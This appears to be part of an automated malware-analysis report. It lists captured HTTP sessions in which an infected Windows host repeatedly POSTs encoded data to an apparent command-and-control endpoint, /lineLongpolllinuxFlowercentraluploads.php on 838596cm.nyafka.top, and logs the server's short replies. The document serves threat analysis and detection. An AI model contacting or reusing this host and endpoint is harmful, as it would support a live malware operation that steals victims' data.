                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b51bd370f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8107&min_rtt=1588&rtt_var=13635&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=27164&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          132192.168.2.550115104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:38.774271011 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:39.129385948 CET2532OUTData Raw: 50 51 5b 57 5c 5b 53 5f 5e 5f 57 54 56 5c 59 5e 57 5e 58 5a 50 5b 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PQ[W\[S_^_WTV\Y^W^XZP[VQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Z?(0#=>-1X8X=._>&82W(/X><$X!=4:?#_&'P-/
                                                                                                          Jan 8, 2025 17:14:39.176188946 CET1236OUTData Raw: 31 0a 13 03 2e 29 23 1b 31 1c 0a 58 0d 3f 33 3c 3e 3f 32 21 04 07 32 06 3c 08 23 2f 04 3d 11 2e 32 0d 05 3a 23 00 3e 3f 3d 3d 07 3f 0b 20 21 1e 26 3f 37 08 3a 58 38 2f 3e 01 03 28 0f 00 24 10 03 2f 0f 09 32 5e 11 5b 3c 0e 09 22 27 06 0a 17 38 31
                                                                                                          Data Ascii: 1.)#1X?3<>?2!2<#/=.2:#>?==? !&?7:X8/>($/2^[<"'8101(,50%$"C,>%+ #.8:%$2E& *_%$$#<Y<5!$:(1&&_6?)2=81<W1<?8'!+=3) ">[2'[<96*:;^2?0#-?1:><91>$"-$0<)[2!D]75<
                                                                                                          Jan 8, 2025 17:14:39.237051010 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:39.433374882 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:39 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FvuxKD38JOMYAbL29iOR60atH%2B%2FdOa5l7eezqpBpwk8U87IWPkWgTLjgbfDGhuH%2F6DMsElI1ENkqFxvDo6pzOQyc8o2DksyS5PolRaDbtWiOo8eRj8K5mD2bC5qORGAEiikNLSdw"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b56ea2e43b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4205&min_rtt=1629&rtt_var=5764&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=65635&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          133192.168.2.550116104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:39.559429884 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:39.910693884 CET2532OUTData Raw: 50 57 5b 52 5c 5f 56 53 5e 5f 57 54 56 56 59 5d 57 54 58 5c 50 59 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW[R\_VS^_WTVVY]WTX\PYV][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#?,% >>>9Y8'?.>]=&;+"+X>?([ =?:#_&'P-
                                                                                                          Jan 8, 2025 17:14:40.013546944 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:40.178446054 CET798INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:40 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDrCbnXCEyf4ZX8uesjesyjNZA13o4SBv1mAInW1nn9TLu9TwqI8qh0lhRtuFP3O72gQWfMc1L6ovOcX0HuvSJRHE4rEu2O97p3lrGUxMi0XlHOkQt1IXDaAW5aVr4JWZSCIAAKD"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b5bc9aa729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4966&min_rtt=2010&rtt_var=6667&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=56889&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          134192.168.2.550117104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:40.305784941 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          135192.168.2.550118104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:40.559844971 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1852
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:40.910801888 CET1852OUTData Raw: 55 56 5b 54 5c 5b 53 5c 5e 5f 57 54 56 5f 59 5b 57 55 58 5e 50 5b 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UV[T\[S\^_WTV_Y[WUX^P[VY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<433:X==*;/=>=]=5\01<"+\>? -(.?#_&'P-#
                                                                                                          Jan 8, 2025 17:14:41.014779091 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:41.435224056 CET953INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:41 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E0aQfumPpoks5dSTjBL8XZWpPLCFC7F93y%2FGTaUDp%2Bo%2Fwa3GNmNYGLMlhJb8KSR4OV5EcnMLbqXClJOY7U2ohMkelYyqlIIcKk0EED6nSfhFAkFgtw3N0CfZwSmZIyIwK8n43GU4"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b620a65424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4411&min_rtt=1569&rtt_var=6273&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2201&delivery_rate=60062&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 11 27 5b 3c 5b 20 15 22 0c 28 5c 2f 12 3d 30 25 02 3a 07 27 02 32 27 3c 14 31 05 3f 00 20 01 2d 5a 3c 16 2a 02 33 35 37 0d 3f 2b 20 5c 04 1f 24 5d 3f 2b 2a 0d 3e 2f 26 16 30 33 2d 1e 26 30 3f 00 25 3e 24 04 27 29 21 0c 37 3a 3c 0e 2f 0d 3e 52 2d 28 2b 01 2b 19 30 5b 24 3e 2f 50 0f 10 38 53 2d 2a 3f 5a 36 31 00 52 21 33 3b 59 23 25 2b 01 3e 03 02 0b 23 2f 0c 07 24 0d 13 53 20 21 33 55 27 55 3f 5e 28 0f 2f 0c 28 09 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98$'[<[ "(\/=0%:'2'<1? -Z<*357?+ \$]?+*>/&03-&0?%>$')!7:</>R-(++0[$>/P8S-*?Z61R!3;Y#%+>#/$S !3U'U?^(/($U,,I?XR0
                                                                                                          Jan 8, 2025 17:14:41.490447044 CET953INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:41 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E0aQfumPpoks5dSTjBL8XZWpPLCFC7F93y%2FGTaUDp%2Bo%2Fwa3GNmNYGLMlhJb8KSR4OV5EcnMLbqXClJOY7U2ohMkelYyqlIIcKk0EED6nSfhFAkFgtw3N0CfZwSmZIyIwK8n43GU4"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b620a65424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4411&min_rtt=1569&rtt_var=6273&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2201&delivery_rate=60062&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 11 27 5b 3c 5b 20 15 22 0c 28 5c 2f 12 3d 30 25 02 3a 07 27 02 32 27 3c 14 31 05 3f 00 20 01 2d 5a 3c 16 2a 02 33 35 37 0d 3f 2b 20 5c 04 1f 24 5d 3f 2b 2a 0d 3e 2f 26 16 30 33 2d 1e 26 30 3f 00 25 3e 24 04 27 29 21 0c 37 3a 3c 0e 2f 0d 3e 52 2d 28 2b 01 2b 19 30 5b 24 3e 2f 50 0f 10 38 53 2d 2a 3f 5a 36 31 00 52 21 33 3b 59 23 25 2b 01 3e 03 02 0b 23 2f 0c 07 24 0d 13 53 20 21 33 55 27 55 3f 5e 28 0f 2f 0c 28 09 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98$'[<[ "(\/=0%:'2'<1? -Z<*357?+ \$]?+*>/&03-&0?%>$')!7:</>R-(++0[$>/P8S-*?Z61R!3;Y#%+>#/$S !3U'U?^(/($U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          136192.168.2.550119104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:40.680288076 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:41.035644054 CET2532OUTData Raw: 55 5c 5b 55 59 5a 56 5c 5e 5f 57 54 56 5f 59 5a 57 57 58 5d 50 5c 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\[UYZV\^_WTV_YZWWX]P\VX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<$33)>9X/B3]>>5=;0;)"((?<!>?X-?#_&'P-#
                                                                                                          Jan 8, 2025 17:14:41.145029068 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:41.435292006 CET808INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:41 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GlBxgEfe9JoN2yf9dq7DOOzkDz7Rsdz16CiJQmOFJ2o6GuU4PoozNfrrf%2Fz0P1Eq6upug%2FS%2FYDDiqsdk4dc6JJ0I%2BXSyJ9bUwOQywkVeQJMiCHeyjSLjRix%2F6cM1UXbrW5FL43zQ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b62dbb7424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3682&min_rtt=1562&rtt_var=4827&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=78803&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          137192.168.2.550120104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:41.558564901 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:41.910624981 CET2528OUTData Raw: 55 55 5b 52 5c 5f 53 59 5e 5f 57 54 56 5e 59 5f 57 56 58 5a 50 5b 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU[R\_SY^_WTV^Y_WVXZP[V][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +#_$0=)==Y;4+)=>'8.(2<*<+5>+X-/#_&'P-3
                                                                                                          Jan 8, 2025 17:14:42.003712893 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:42.246547937 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:42 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88x73OcqYncMUiYIMR2i1HRzHvcmUBoFxBNbFbsbvWnGj3ArxTTKDZRFNNK8tITG9jfGADcS0zOH1%2FLq4izprxyOH%2FBvLCxpijjk7ipd%2BRxGqMPglmhchJsC5fVMN%2F7qFekjDzDK"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b683a39727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2011&rtt_var=758&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2853&delivery_rate=726006&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          138192.168.2.550121104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:42.381316900 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:42.738692999 CET2532OUTData Raw: 50 56 5e 50 5c 58 56 5b 5e 5f 57 54 56 5f 59 5a 57 52 58 59 50 5c 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV^P\XV[^_WTV_YZWRXYP\V][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#((4$._>=!Y8Y?.2=;3+.Q+)[6[<9?#_&'P-#
                                                                                                          Jan 8, 2025 17:14:42.834228992 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:42.994313955 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:42 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJBaTLUgfd1YAh8OsWM1Oykrmdwdea1eIBCywLCO27U%2FWNAAyCDcFDyfPJQ3u90%2FkgBVdy1WFToaJwVGUGDr7ffptMs8TURLs90in59NPEE2WN0GqxqeCt%2FCu694RZeelvcKYStf"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b6d69a30f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3521&min_rtt=1611&rtt_var=4425&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=86416&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          139192.168.2.550122104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:43.118020058 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:43.473115921 CET2532OUTData Raw: 55 57 5e 5f 59 5d 56 5b 5e 5f 57 54 56 59 59 5c 57 51 58 5d 50 59 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UW^_Y]V[^_WTVYY\WQX]PYVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _+^303)>:/?[=>5)%08")"3X>?#5-<,?#_&'P-
                                                                                                          Jan 8, 2025 17:14:43.566772938 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:43.815283060 CET801INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:43 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JVAcQKH7zkb%2BtD3Zu1UWsseFM6acg4PChNNW7XoFhJEX9Y8A7CYE9fej9HnmzK3TUbA2iaL1efOjp8Gk9FSTohZMOJ8rhVmKu62j%2BlWjqEkllgt%2BUffgWl%2Bq08LLyVUW3XoQOAV5"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b720dbdc34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3535&min_rtt=1508&rtt_var=4619&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=82374&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:14:43.902657032 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          140192.168.2.550123104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:44.024257898 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:44.379733086 CET2532OUTData Raw: 55 54 5e 5f 59 5c 56 5d 5e 5f 57 54 56 57 59 5d 57 51 58 5c 50 5b 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UT^_Y\V]^_WTVWY]WQX\P[VP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ *8,3>Y=-,$?=-=^*13+>Y4Z!-^.#_&'P-
                                                                                                          Jan 8, 2025 17:14:44.500855923 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:44.728779078 CET801INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:44 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
